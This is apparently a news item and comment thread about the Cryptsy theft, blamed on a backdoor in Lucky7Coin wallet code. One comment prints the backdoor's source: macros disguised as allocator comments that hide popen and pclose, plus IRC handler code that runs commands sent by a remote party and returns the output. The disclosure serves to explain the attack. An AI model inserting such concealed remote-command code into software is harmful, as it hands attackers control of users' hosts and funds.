Cryptsy Bitcoin Trader Robbed, Blames Backdoor In the Code of a Wallet

An anonymous reader writes: Cryptsy, a website for trading Bitcoin, Litecoin, and other smaller crypto-currencies, announced a security incident, accusing the developer of Lucky7Coin of stealing 13,000 Bitcoin and 300,000 Litecoin, which at today's rate stands more than $5.7 million / €5.2 million. Cryptsy says "the developer of Lucky7Coin had placed an IRC backdoor into the code of [a] wallet, which allowed it to act as a sort of a Trojan, or command and control unit." Coincidentally this also explains why two days after the attack was carried out, exactly 300,000 Litecoin were dumped on the BTC-e exchange, driving Litecoin price down from $9.5 to $2.

known for months

[Gravis+Zero]

https://github.com/alerj78/luc...

dooglus commented on Mar 8, 2015

There's a backdoor in the IRC code that gives the attacker the ability to run arbitrary commands on the victim's host.

In src/allocators.h we see these macros being defined, in an attempt to hide 'popen' and 'pclose' calls:

/** Determine system page size in bytes */
#define S_ORDER(a,b,c,d) b##a##d##c /**
  * OS-dependent memory page locking/unlocking.
  * Defined as policy class to make stubbing for test possible.
  */
#define CLine S_ORDER(I,F,E,L) /**
  * Singleton class to keep track of locked (ie, non-swappable) memory pages, for use in
  * std::allocator templates.
  */
#define CRead S_ORDER(p,po,n,e)
#define CFree S_ORDER(cl,p,e,os) // // Allocator that locks its contents from being paged // out of memory and clears its contents before deletion. //
#define CBuff "PR" "IV" "M" "SG"

Then in irc.cpp they are used to implement the backdoor:

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
    {
        CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
        if (buf) {
            std::string result = "";
            while (!feof(buf))
                if (fgets(pszName, sizeof(pszName), buf) != NULL)
                    result += pszName;
            CFree(buf);
            strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
            if (strchr(pszName, '!'))
                *strchr(pszName, '!') = '\0';
            Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
        }
    }

I expect this is a known issue since this kind of thing doesn't happen accidentally.

Re: known for months

Irc was one of the initial means of peer discovery. It has been long since replaced with better mechanisms

The Developer of Lucky7Coin...

[Fnord666]

It was not the developer of Lucky7Coin that introduced this backdoor, or at least not the original developer. The heart of this attack was a social engineering. Lucky7Coin support had been abandoned. Someone else came along, claiming that they were taking over support for this particular altcoin. They even created a new github repo for it. As part of the initial commit though they introduced a backdoor. Cryptsy picked up the new version of the code and the rest is history.

Re:No sympathy here.

[Applehu+Akbar]

All of those things you mentioned are not a currency. When the stock market crashed, or the dot com bubble crashed, or the "global financial meltdown" happened, did the 10 dollars in your pocket turn into 2 dollars?

No, it took Jimmy Carter to do that.